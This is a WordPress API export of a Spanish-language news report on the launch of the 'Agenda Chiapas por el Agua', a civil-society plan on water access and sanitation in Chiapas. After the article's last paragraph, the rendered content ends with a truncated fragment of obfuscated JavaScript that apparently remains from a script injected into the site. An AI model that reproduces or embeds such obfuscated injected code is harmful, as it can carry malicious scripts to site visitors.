{"id":15928,"date":"2024-06-05T01:51:46","date_gmt":"2024-06-05T01:51:46","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=15928"},"modified":"2024-06-05T01:51:47","modified_gmt":"2024-06-05T01:51:47","slug":"presentan-agenda-chiapas-por-el-agua-en-el-dia-mundial-del-medio-ambiente","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=15928","title":{"rendered":"Presentan &#8220;Agenda Chiapas por el Agua&#8221; en el D\u00eda Mundial del Medio Ambiente"},"content":{"rendered":"\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"683\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/06\/IMG-20240604-WA0029-1024x683.jpg\" alt=\"\" class=\"wp-image-15929\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/06\/IMG-20240604-WA0029-1024x683.jpg 1024w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/06\/IMG-20240604-WA0029-300x200.jpg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/06\/IMG-20240604-WA0029-768x512.jpg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/06\/IMG-20240604-WA0029.jpg 1500w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<p>\u00d3scar G\u00f3mez\/ Corresponsal<\/p>\n\n\n\n<p>4 de junio del 2024. San Crist\u00f3bal de Las Casas.- En el marco del D\u00eda Mundial del Medio Ambiente, se dar\u00e1n a conocer los contenidos de la &#8220;Agenda Chiapas por el Agua&#8221; en el Colegio de la Frontera Sur. Este evento es impulsado por diversas organizaciones de base comunitaria y de la sociedad civil, destacando la participaci\u00f3n de &#8220;C\u00e1ntaro Azul&#8221;, representada por M\u00f3nica Olvera Molina, directora de estrategia de cambio sist\u00e9mico e incidencias.<\/p>\n\n\n\n<p>En una entrevista, Olvera Molina destac\u00f3 la parad\u00f3jica situaci\u00f3n que vive Chiapas y es que a pesar de contar con el 30 por ciento de los recursos h\u00eddricos del pa\u00eds, es uno de los estados con menor acceso al agua.<\/p>\n\n\n\n<p>&#8220;En Chiapas, hay grandes dificultades porque el agua no se desinfecta antes de llegar a los hogares, lo cual ocasiona muchas enfermedades. En San Crist\u00f3bal de las Casas, hemos visto un brote de hepatitis, y somos el segundo estado en muerte infantil debido a que no se garantiza el agua&#8221;, expres\u00f3.<\/p>\n\n\n\n<p>Explic\u00f3 que la &#8220;Agenda Chiapas por el Agua&#8221; ha sido construida en colaboraci\u00f3n con organizaciones comunitarias de diversos municipios del estado. Este documento comprende 15 puntos cruciales que surgieron de los tres encuentros por el agua, y aboga por garantizar los derechos humanos relacionados con el saneamiento del agua. &#8220;Todas las instituciones deben trabajar mediante programas y presupuestos para que esto sea posible en el estado\u201d.<\/p>\n\n\n\n<p>\u201cLa presentaci\u00f3n de la agenda busca movilizar a las autoridades y la sociedad hacia una gesti\u00f3n m\u00e1s equitativa y efectiva del recurso h\u00eddrico, resaltando la urgencia de actuar para mejorar la calidad de vida de los habitantes de Chiapas y preservar la salud p\u00fablica\u201d, finaliz\u00f3.<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>\u00d3scar G\u00f3mez\/ Corresponsal 4 de junio del 2024. San Crist\u00f3bal de Las Casas.- En el marco del D\u00eda Mundial del Medio Ambiente, se dar\u00e1n a conocer los contenidos de la &#8220;Agenda Chiapas por el Agua&#8221; en el Colegio de la Frontera Sur. Este evento es impulsado por diversas organizaciones de base comunitaria y de la &hellip;<\/p>\n","protected":false},"author":2,"featured_media":15929,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[7],"tags":[],"class_list":["post-15928","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-chiapas"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/15928","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=15928"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/15928\/revisions"}],"predecessor-version":[{"id":15930,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/15928\/revisions\/15930"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/15929"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=15928"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=15928"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=15928"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}